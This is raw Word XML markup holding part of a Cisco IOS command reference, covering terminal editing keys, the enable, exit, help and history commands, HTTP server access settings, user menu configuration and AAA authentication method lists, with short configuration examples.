        <w:t xml:space="preserve">Moves the cursor forward one wor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sc L </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Changes the word to lowercase at the cursor to the end of the wor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sc U </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Capitalizes from the cursor to the end of the wor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sc Y </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Recalls the next buffer entry. The buffer contains the last ten items you have deleted. Press Ctrl-Y first to recall the most recent entry. Then press Esc Y up to nine times to recall the remaining entries in the buffer. If you bypass an entry, continue to press Esc Y to cycle back to i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e arrow keys function only with ANSI-compatible termin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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Func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lete or Backspace </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erases the character to the left of the curso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W </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erases a wor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U </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erases a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R </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Redisplays a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Z </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Ends configuration mode and returns to the EXEC promp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eturn </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Executes single-line command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enhanced editing mode is disabled on line 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ine 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 edi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erminal editing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0.4] enab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ter privileged EXEC mode, use the enable EXEC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evel </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Privileged level on which to log i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e enable command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege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Because many of the privileged commands set operating parameters, privileged access should be password-protected to prevent unauthorized use. If the system administrator has set a password with the enable password global configuration command, you are prompted to enter it before being allowed access to privileged EXEC mode. The password is case sensiti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an enable password has not been set, enable mode only can be accessed from the router console. If a level is not specified, it defaults to the privileged EXEC mode, which is level 15.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the user enters the enable command and is prompted to enter a password. The password is not displayed on the screen. After the user enters the correct password, the system enters privileged command mode as indicated by the pound sign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gt; en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password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0.5] e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xit configuration mode, or any of the configuration submodes, use the end global configuration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can also press Ctrl-Z to exit configuration mo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the name is changed to george using the hostname global configuration command. Entering the end command causes the system to exit configuration mode and return to EXEC mo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config)# hostname geor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eorge(config)# e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eor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ostnam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0.6] ex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xit any configuration mode or close an active terminal session and terminate the EXEC, use the exit command at the system promp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vailable in all command mod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exit command at the EXEC levels to exit the EXEC mode. Use the exit command at the configuration level to return to privileged EXEC mode. Use the exit command in interface, line, router, IPX-router, and route-map command modes to return to global configuration mode. Use the exit command in subinterface configuration mode to return to interface configuration mode. You also can press Ctrl-Z, or use the end command, from any configuration mode to return to privileged EXEC mo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e exit command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege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the user exits subinterface configuration mode to return to interface configuration mo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config-subif)# ex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config-i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hows how to exit an active sess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gt; ex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connect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gout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0.7] full-hel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get help for the full set of user-level commands, use the full-help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ull-hel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vailable in all command mod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ull-help command enables (or disables) an unprivileged user to see all of the help messages available. It is used with the show?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is output for show? with full-help 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gt;     show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lock            Display the system clo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story      Display the session command his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osts          IP domain-name, lookup style, nameservers, and host t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ssions     Information about Telnet connec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rminal     Display terminal configuration paramet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s        Display information about terminal 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ersion      System hardware and software stat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el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0.8] hel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display a brief description of the help system, enter the help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el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vailable in all command mod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help command provides a brief description of the context-sensitive help syste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To list all commands available for a particular command mode, enter a question mark (?) at the system promp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To obtain a list of commands that begin with a particular character string, enter the abbreviated command entry immediately followed by a question mark (?). This form of help is called word help, because it lists only the keywords or arguments that begin with the abbreviation you enter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To list a command's associated keywords or arguments, enter a question mark (?) in place of a keyword or argument on the command line. This form of help is called command syntax help, because it lists the keywords or arguments that apply based on the command, keywords, and arguments you have already enter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e help command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege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ter the help command for a brief description of the help syste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 hel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lp may be requested at any point in a command by enter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question mark '?'. If nothing matches, the help list wi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 empty and you must backup until entering a '?' shows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vailable op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wo styles of help are provid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Full help is available when you are ready to enter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command argument (e.g. 'show ?') and describes each possi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rgu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 Partial help is provided when an abbreviated argument is en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nd you want to know what arguments match the inp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e.g. 'show p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hows how to use word help to display all the privileged EXEC commands that begin with the letters "c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 c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nfigure  connect  cop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hows how to use command syntax help to display the next argument of a partially complete access-list command. One option is to add a wildcard mask. The &lt;cr&gt; symbol indicates that the other option is to press Return to execute the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config)# access-list 99 deny 131.108.134.234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B.C.D  Mask of bits to igno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t;cr&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ull-hel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0.9] histo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the command history function, or to change the command history buffer size for a particular line, use the history line configuration command. To disable the command history feature, use the no form of this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istory [size number-of-lin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history [size number-of-lin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ize number-of-lines </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Specifies the number of command lines that the system will record in its history buffer. The range is 0 to 256.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0 lin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ne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history command without the size keyword and the number-of-lines argument enables the history function with the last buffer size specified or with the default of 10 lines, if there was not a prior sett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no history command without the size keyword and the number-of lines argument disables the history feature but remembers the buffer size if it was something other than the default. The no history size command resets the buffer size to 1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e history size command only sets the size of the buffer; it does not reenable the history feature. If the no history command is used, the history command must be used to reenable this featu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command history feature provides a record of EXEC commands that you have entered. This feature is particularly useful for recalling long or complex commands or entries, including access lis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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Function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P or Up Arrow Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older command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N or Down Arrow1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the Up Arrow. Repeat the key sequence to recall successively more recent command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The arrow keys function only with ANSI-compatible terminals such as VT100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line 4 is configured with a history buffer size of 35 lin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ine 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story size 3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how histo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erminal history siz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0] ip http access-cla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assign an access-list to the http server used by the Cisco IOS ClickStart software or the Cisco Web browser interface, use the ip http access-class global configuration command. To remove the assigned access list, use the no form of this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http access-class {access-list-number | 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ip http access-class {access-list-number | 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ccess-list-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Standard IP access list number in the range 0 to 99, as configured by the access-list (standard) comman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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of a standard IP access list, as configured by the ip access-list comman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re is no access list applied to the http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this command is configured, the specified access list is assigned to the http server. Before the http server accepts a connection, it checks the access list. If the check fails, the http server does not accept the request for a connec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command assigns the access list named marketing to the http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 http access-class marke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 access-list standard marke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ermit 192.5.34.0  0.0.0.25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ermit 128.88.0.0  0.0.255.25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ermit 36.0.0.0  0.255.255.25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Note: all other access implicitly deni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access-list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http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1] ip http por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specify the port to be used by the Cisco IOS ClickStart software or the Cisco Web browser interface, use the ip http port global configuration command. To use the default port, use the no form of this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http port numb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ip http por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umber </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Port number for use by ClickStart or the Cisco Web browser interface. The default is 80.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8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is command if ClickStart or the Cisco Web browser interface cannot use port 8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command configures the router so that you can use ClickStart or the Cisco Web browser interface via port 6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 http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 http port 6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http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2] ip http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a Cisco 1003, Cisco 1004, or Cisco 1005 router to be configured from a browser using the Cisco IOS ClickStart software, and to enable any router to be monitored or have its configuration modified from a browser using the Cisco Web browser interface, use the ip http server global configuration command. To disable this feature, use the no form of this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http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ip http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feature is enabled on Cisco 1003, Cisco 1004, and Cisco 1005 routers that have not yet been configured. For Cisco 1003, Cisco 1004, and Cisco 1005 routers that have already been configured, and for all other routers, this feature is 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command configures the router so that you can use the Cisco Web browser interface to issue commands to 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 http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http access-cla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http por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3] menu (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menu EXEC command to invoke a user menu.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 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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The configuration name of the menu.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 EXEC mode or privileged EXEC mo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menu can be invoked at either the user or privileged EXEC level, but if an item in the menu contains a privileged EXEC command, the user must be logged in at the privileged level for the command to succe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hows how to invoke the menu named Access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nu Access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4] menu (globa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menu global configuration command with the appropriate keyword to specify menu-display options. Use the no form of the global configuration command to delete a specified, or named, menu from the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 name [clear-screen | line-mode | single-space | status-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menu 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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The configuration name of the menu.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lear-screen </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Clears the terminal screen before displaying a menu.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ne-mode </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) In a menu of nine or fewer items, you ordinarily select a menu item by entering the item number. In line mode, you select a menu entry by entering the item number and pressing Return. Line mode allows you to backspace over the selected number and enter another number before pressing Return to execute the command. This option is activated automatically when more than nine menu items are defined but also can be configured explicitly for menus of nine or fewer item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ingle-space </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Displays menu items single-spaced rather than double-spaced. This option is activated automatically when more than nine menu items are defined but also can be configured explicitly for menus of nine or fewer item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tatus-line </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Displays a line of status information about the current use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clear-screen option uses a terminal-independent mechanism based on termcap entries defined in the router and the terminal type configured for the user's terminal. The clear-screen option allows the same menu to be used on multiple types of terminals instead of having terminal-specific strings embedded within menu titles. If the termcap entry does not contain a clear string, the menu system enters 24 newlines, causing all existing text to scroll off the top of the terminal scree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status-line option displays the status information at the top of the screen before the menu title is displayed. This status line includes the router's host name, the user's line number, and the current terminal type and keymap type (if an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menu can be activated at the user EXEC level or at the privileged EXEC level, depending upon whether the given menu contains menu entries using privileged comma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a particular line should always display a menu, that line can be configured with an autocommand configuration command. The menu should not contain any exit paths that leave users in an unfamiliar interface environme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s can be run on a per-user basis by defining a similar autocommand for that local user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hows how to invoke the menu named Access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nu Access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hows how to display the status information using the status-line option for the menu named Access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nu Access1 status-l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 command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 tex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 tit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esum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5] menu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menu command global configuration command to specify underlying commands for user interface menu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 name command numb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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The configuration name of the menu. You can specify a maximum of 20 character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umber </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The selection number associated with the menu entry. This number is displayed to the left of the menu entry. You can specify a maximum of 18 menu entries. When the tenth item is added to the menu, the line-mode and single-space options are activated automatically.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menu command and menu text commands define a menu entry. These commands must use the same menu name and menu selection numb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menu command has a special option, menu-exit, that is available only within menus. It is used to exit a submenu and return to the previous menu level or exit the menu altogether and return to the EXEC command promp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can create submenus that are opened by selecting a higher-level menu entry. Use the menu command to invoke a menu as the command in a line specifying a higher-level menu ent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If you nest too many levels of menus, the system prints an error message on the terminal and returns to the previous menu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a menu allows connections (their normal use), the command for an entry activating the connection should contain a resume command, or the line should be configured to prevent users from escaping their sessions with the escape-char none command. Otherwise, when they escape from a connection and return to the menu, there will be no way to resume the session and it will sit idle until the user logs off.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pecifying the resume command as the action that is performed for a selected menu entry permits a user to resume a named connection or connect using the specified name, if there is no active connection by that name. As an option, you can also supply the connect string needed to connect initially. When you do not supply this connect string, the command uses the specified connection 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can also use the resume/next command, which resumes the next connection in the user's list of connections. This function allows you to create a single menu entry that steps through all of the user's connection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efer to the Access Services Configuration Guide for more information on the menu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hows how to specify the commands to be executed when a user enters the selection number associated with the menu entry for the menu named Access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nu Access1 command 1 tn3270 vms.cisco.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nu Access1 command 2 rlogin unix.cisco.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nu Access1 command 3 menu-ex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 (global)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 tex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 tit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esum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6] menu tex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menu text global configuration command to specify the text of a menu item in a user interface menu.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 name text numb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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The configuration name of the menu. You can specify a maximum of 20 character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umber </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The selection number associated with the menu item. This number is displayed to the left of the menu item. You can specify a maximum of 18 menu items. When the tenth item is added to the menu, the line-mode and single-space options are activated automatically.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menu text command and the menu command define a menu item. These commands must use the same menu name and menu selection numb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can specify a maximum of 18 items in a menu.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hows how to specify the descriptive text for the three entries in the menu Access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nu Access1 text 1 IBM Information Syste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nu Access1 text 2 UNIX Internet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nu Access1 text 3 Exit menu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 (globa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 tit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esum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7] menu tit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menu title global configuration command to create a title, or banner, for a user menu.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 name title delimi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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The configuration name of the menu. You can specify a maximum of 20 character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limiter </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Characters that mark the beginning and end of a title. Text delimiters are characters that do not ordinarily appear within the text of a title, such as slash ( / ), double quote ("), and tilde ( ~ ). Ctrl-C is reserved for special use and should not be used in the text of the titl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menu title command must use the same menu name used with the menu text and menu command commands used to create a menu.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can position the title of the menu horizontally by preceding the title text with blank characters. You can also add lines of space above and below the title by pressing Retur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ollow the title keyword with one or more blank characters and a delimiting character of your choice. Then enter one or more lines of text, ending the title with the same delimiting character. You cannot use the delimiting character within the text of the messag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you are configuring from a terminal and are attempting to include special control characters, such as a screen-clearing string, you must use Ctrl-V before the special control characters so that they are accepted as part of the title string. The string ^[[H^[[J is an escape string used by many VT100-compatible terminals to clear the screen. To use a special string, you must enter Ctrl-V before each escape charac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also can use the clear-screen option of the menu command to clear the screen before displaying menus and submenus, instead of embedding a terminal-specific string in the menu title. The clear-screen option allows the same menu to be used on different types of terminal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the title that will be displayed when the menu Access1 is invok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s101(config)# menu Access1 title /^[[H^[[J</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elcome to Access1 Internet Serv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ype a number to select an o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ype 9 to exit the men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 (globa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nu tex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esum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8] show histo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list the commands you have entered in the current EXEC session, use the show history EXEC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how histo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command history feature provides a record of EXEC commands you have entered. The number of commands that the history buffer will record is determined by the history size line configuration command or the terminal history size EXEC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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Func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P or Up Arrow </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older command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N or Down Arrow </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the Up Arrow. Repeat the key sequence to recall successively more recent command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ample Displ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is sample output from the show history command, which lists the commands the user has entered in EXEC mode for this sess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 show his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hel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he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how ho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how his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ou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istory siz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erminal history siz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1.9] terminal edit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the enhanced editing mode on the local line, use the terminal editing EXEC command. To disable the enhanced editing mode on the current line, use the no form of this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erminal edit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erminal no edit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s </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Func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b </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Completes a partial command name entry. When you enter a unique set of characters and press the Tab key, the system completes the command name. If you enter a set of characters that could indicate more than one command, the system beeps to indicate an error. Enter a question mark (?) immediately following the partial command (no space). The system provides a list of commands that begin with that string.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lete or Backspace </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erases the character to the left of the curso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eturn </w:t>
        <w:tab/>
        <w:t xml:space="preserve">At the command line, pressing the Return key performs the function of processing, or carrying out, a command. At the " ---More--- " prompt on a terminal screen, pressing the Return key scrolls down a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pace Bar </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Scrolls down a page on the terminal screen. Press the space bar when you see the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More--- " on the screen to display the next scree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eft arrow Moves the cursor one character to the left. When you enter a command that extends beyond a single line, you can continue to press the left arrow key at any time to scroll back toward the system prompt and verify the beginning of the command entry.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ight arrow1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor one character to the righ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p arrow1 or Ctrl-P </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Recalls commands in the history buffer, beginning with the most recent command. Repeat the key sequence to recall successively older command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own arrow1 o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N </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return to more recent commands in the history buffer after recalling commands with th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p arrow or Ctrl-P. Repeat the key sequence to recall successively more recent command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A </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor to the beginning of the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B </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor back one characte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D </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes the character at the curso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E </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor to the end of the command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F </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor forward one characte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K </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes all characters from the cursor to the end of the command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L and Ctrl-R </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Redisplays the system prompt and command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T </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Transposes the character to the left of the cursor with the character located at the curso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U and Ctrl-X </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes all characters from the cursor back to the beginning of the command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V and Esc Q </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Inserts a code to indicate to the system that the key stroke immediately following should be treated as a command entry, not as an editing key.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W </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes the word to the left of the curso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Y </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Recalls the most recent entry in the delete buffer. The delete buffer contains the last ten items you have deleted or cut. Ctrl-Y can be used in conjunction with Esc Y.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Z </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Ends configuration mode and returns you to the EXEC promp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sc B </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor back one wor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sc C </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Capitalizes the word at the curso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sc D </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Deletes from the cursor to the end of the wor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sc F </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Moves the cursor forward one wor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sc L </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Changes the word at the cursor to lowercas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sc U </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Capitalizes from the cursor to the end of the wor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sc Y </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Recalls the next buffer entry. The buffer contains the last ten items you have deleted. Press Ctrl-Y first to recall the most recent entry. Then press Esc Y up to nine times to recall the remaining entries in the buffer. If you bypass an entry, continue to press Esc Y to cycle back to i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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Func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lete or Backspace </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erases the character to the left of the curso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W </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erases a wor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U </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erases a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R </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Redisplays a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Z </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Ends configuration mode and returns to the EXEC promp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eturn </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Executes single-line command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enhanced mode editing is reenabled for the current terminal sess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rminal edi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dit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0] terminal full-help (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get help for the full set of user-level commands, use the terminal full-help EXEC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erminal full-hel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terminal full-help command enables (or disables) a user to see all of the help messages available from the terminal. It is used with the show ?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is output for show ? with terminal full-help en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gt; terminal full-hel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gt; show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ccess-lists  List access li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ppletalk     AppleTalk inform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rap          Show Appletalk Remote Access statistic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rp           ARP t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ync         Information on terminal lines used as router interfa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ull-hel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el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1] terminal histo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the command history feature for the current terminal session or change the size of the command history buffer for the current terminal session, use the terminal history EXEC command. To disable the command history feature or reset the command history buffer to its default size, use the no form of this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erminal history [size number-of-lin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erminal no history [siz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ize </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Sets command history buffer siz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umber-of-lines </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Specifies the number of command lines that the system will record in its history buffer. The range is 0 to 256.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0 lin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history command without the size keyword and argument enables the command history feature with the last buffer size specified or the default size. The no history command without the size keyword disables the command history feature. The no history size command resets the buffer size to the default of 10 command lin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history command provides a record of EXEC commands you have entered. This feature is particularly useful to recall long or complex commands or entries, including access lis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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Func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P or up arrow Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older command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trl-N or down arrow1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the up arrow. Repeat the key sequence to recall successively more recent command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The arrow keys function only with ANSI-compatible terminals such as VT100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the number of command lines recorded is set to 15 for the local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rminal history size 1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isto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how histo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2.2] Network Access Security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hapter describes the commands used to manage security on the networ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3] aaa authentication ara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an Authentication Authorization and Accounting (AAA) authentication method for AppleTalk Remote Access (ARA) users using TACACS+, use the aaa authentication arap global configuration command. Use the no form of this command to disable this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arap {default | list-name} method1 [...[method4]]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aaa authentication arap {default | list-name} method1 [...[method4]]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fault </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the listed methods that follow this argument as the default list of methods when a user logs i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st-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Character string used to name the following list of authentication methods tried when a user logs i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thod </w:t>
        <w:tab/>
        <w:t xml:space="preserve">One of the keywords described in Table 1.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the default list is not set, only the local user database is checked. This version has the same effect as the following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entication arap default loc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list names and default that you set with the aaa authentication arap command are used with the arap authentication command. These lists can contain up to four authentication methods that are used when a user tries to log in with ARA. Note that ARAP guest logins are disabled by default when you enable AAA/TACACS+. To allow guest logins, you must use either the guest or auth-guest method listed in Table 1. You can only use one of these methods; they are mutually exclusi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reate a list by entering the aaa authentication arap list-name method command, where list-name is any character string used to name this list (such as MIS-access.) The method argument identifies the list of methods the authentication algorithm tries in the given sequence. You can enter up to four metho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show running-config command to view lists of authentication metho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ble 1 AAA Authentication ARAP Metho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word </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Descrip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uest </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Allows guest logins. This method must be the first method listed, but it can be followed by other methods if it does not succe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uth-guest </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Allows guest logins only if the user has already logged in to EXEC. This method must be the first method listed, but can be followed by other methods if it does not succe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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the line password for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cal </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the local username database for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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses TACACS+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adius </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses RADIUS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is command cannot be used with TACACS or extended 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reates a list called MIS-access, which first tries TACACS+ authentication and then no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entication arap MIS-access tacacs+ n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reates the same list, but sets it as the default list that is used for all ARA protocol authentications if no other list is specifi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entication arap default tacacs+ n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local-overri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new-mod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new-mod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4] aaa authentication enable defaul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AAA authentication to determine if a user can access the privileged command level, use the aaa authentication enable default global configuration command. Use the no form of this command to disable this authorization metho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enable default method1 [...[method4]]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aaa authentication enable default method1 [...[method4]]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thod </w:t>
        <w:tab/>
        <w:t xml:space="preserve">At least one and up to four of the keywords described in Table 2.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the default list is not set, only the enable password is checked. This version has the same effect as the following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entication enable default en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n the console, the enable password is used if it exists. If no password is set, the process will succeed anywa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aaa authentication enable default command to create a series of authentication methods that are used to determine whether a user can access the privileged command level. You can specify up to four authentication methods. Method keywords are described in Table 2. The additional methods of authentication are used only if the previous method returns an error, not if it fails. To specify that the authentication should succeed even if all methods return an error, specify none as the final method in the command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a default authentication routine is not set for a function, the default is none and no authentication is performed. Use the show running-config command to view currently configured lists of authentication metho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ble 2 AAA Authentication Enable Default Metho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word </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Descrip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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the enable password for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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the line password for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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses no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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses TACACS+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adius </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses RADIUS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is command cannot be used with TACACS or extended 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reates an authentication list that first tries to contact a TACACS+ server. If no server can be found, AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no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entication enable default tacacs+ enable n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local-overri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oriz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new-mod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password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5] aaa authentication local-overri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configure the Cisco IOS software to check the local user database for authentication before attempting another form of authentication, use the aaa authentication local-override global configuration command. Use the no form of this command to disable the overri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local-overri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aaa authentication local-overri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verride is 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is useful when you want to configure an override to the normal authentication process for certain personnel such as system administrato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this override is set, the user is always prompted for the username. The system then checks to see if the entered username corresponds to a local account. If the username does not correspond to one in the local database, login proceeds with the methods configured with other aaa commands (such as aaa authentication login). Note that when using this command Username: is fixed as the first promp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enables AAA authentication overri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entication local-overri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ara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enable defaul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logi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pp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new-mod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6] aaa authentication logi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set AAA authentication at login, use the aaa authentication login global configuration command. Use the no form of this command to disable AAA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login {default | list-name} method1 [...[method4]]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aaa authentication login {default | list-name} method1 [...[method4]]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fault </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the listed authentication methods that follow this argument as the default list of methods when a user logs i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st-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Character string used to name the following list of authentication methods activated when a user logs i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thod </w:t>
        <w:tab/>
        <w:t xml:space="preserve">At least one and up to four of the keywords described in Table 3.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the default list is not set, only the local user database is checked. This version has the same effect as the following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entication login default loc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On the console, login will succeed without any authentication checks if default is not s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default and optional list names that you create with the aaa authentication login command are used with the login authentication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reate a list by entering the aaa authentication list-name method command for a particular protocol, where list-name is any character string used to name this list (such as MIS-access). The method argument identifies the list of methods that the authentication algorithm tries, in the given sequence. Method keywords are described in Table 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create a default list that is used if no list is assigned to a line, use the login authentication command with the default argument followed by the methods you want to use in default situation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additional methods of authentication are used only if the previous method returns an error, not if it fails. To ensure that the authentication succeeds even if all methods return an error, specify none as the final method in the command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authentication is not specifically set for a line, the default is to deny access and no authentication is performed. Use the show running-config command to display currently configured lists of authentication metho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ble 3 AAA Authentication Login Metho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word </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Descrip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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the enable password for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rb5 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses Kerberos 5 for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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the line password for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cal </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the local username database for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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses no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adius </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses RADIUS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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses TACACS+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rb5-telnet </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses Kerberos 5 Telnet authentication protocol when using Telnet to connect to the route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is command cannot be used with TACACS or extended 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reates an AAA authentication list called MIS-access. This authentication first tries to contact a TACACS+ server. If no server is found, TACACS+ returns an error and AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no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entication login MIS-access tacacs+ enable n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reates the same list, but it sets it as the default list that is used for all login authentications if no other list is specifi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entication login default tacacs+ enable n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ets authentication at login to use the Kerberos 5 Telnet authentication protocol when using Telnet to connect to the rou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entication login default KRB5-TELNET krb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is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local-overri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new-mod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gin authentication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7] aaa authentication nasi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specify AAA authentication for Netware Asynchronous Services Interface (NASI) clients connecting through the access server, use the aaa authentication nasi global configuration command. Use the no form of this command to disable authentication for NASI clien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nasi {default | list-name} method1 [...[method4]]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aaa authentication nasi{default | list-name} method1 [...[method4]]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yntax Descrip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fault </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Makes the listed authentication methods that follow this argument the default list of methods used when a user logs i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st-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Character string used to name the following list of authentication methods activated when a user logs i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thods </w:t>
        <w:tab/>
        <w:t xml:space="preserve">At least one and up to four of the methods described in Table 4.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the default list is not set, only the local user database is selected. This setting has the same effect as the following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entication nasi default loc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default and optional list names that you create with the aaa authentication nasi command are used with the nasi authentication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reate a list by entering the aaa authentication nasi command, where list-name is any character string that names this list (such as MIS-access). The method argument identifies the list of methods the authentication algorithm tries in the given sequen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create a default list that is used if no list is assigned to a line with the nasi authentication command, use the default argument followed by the methods that you want to use in default situation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remaining methods of authentication are used only if the previous method returns an error, not if it fails. To ensure that the authentication succeeds even if all methods return an error, specify none as the final method in the command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authentication is not specifically set for a line, the default is to deny access and no authentication is performed. Use the show running-config command to displays currently configured lists of authentication metho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ble 4 AAA Authentication NASI Metho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word </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Descrip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w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the enable password for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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the line password for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cal </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the local username database for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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses no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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses TACACS+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is command cannot be used with TACACS or extended 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reates an AAA authentication list called list1. This authentication first tries to contact a TACACS+ server. If no server is found, TACACS+ returns an error and AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no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entication nasi list1 tacacs+ enable n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reates the same list, but sets it as the default list that is used for all login authentications if no other list is specifi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entication nasi default tacacs+ enable n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elated Comma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x nasi-server enabl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asi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how ipx nasi connections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how ipx spx-protocol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8] aaa authentication password-promp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change the text displayed when users are prompted for a password, use the aaa authentication password-prompt global configuration command. Use the no form of this command to return to the default password prompt tex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password-prompt {text-str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aaa authentication password-prompt {text-str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ext-string </w:t>
        <w:tab/>
        <w:t xml:space="preserve">String of text that will be displayed when the user is prompted to enter a password. If this text-string contains spaces or unusual characters, it must be enclosed in double-quotes (for example, "Enter your passwor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is disabled by defaul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aaa authentication password-prompt command to change the default text that the Cisco IOS software displays when prompting a user to enter a password. This command changes the password prompt for the enable password as well as for login passwords that are not supplied by remote security servers. The no form of this command returns the password prompt to the default valu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aaa authentication password-prompt command does not change any dialog that is supplied by a remote TACACS+ or RADIUS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hanges the text for the password promp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entication password-prompt "Enter your password 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username promp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new-mod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password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2.9] aaa authentication pp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specify one or more AAA authentication methods for use on serial interfaces running Point-to-Point (PPP) and TACACS+, use the aaa authentication ppp global configuration command. Use the no form of this command to disable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ppp {default | list-name} method1 [...[method4]]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aaa authentication ppp {default | list-name} method1 [...[method4]]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fault </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the listed authentication methods that follow this argument as the default list of methods when a user logs i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st-name </w:t>
        <w:tab/>
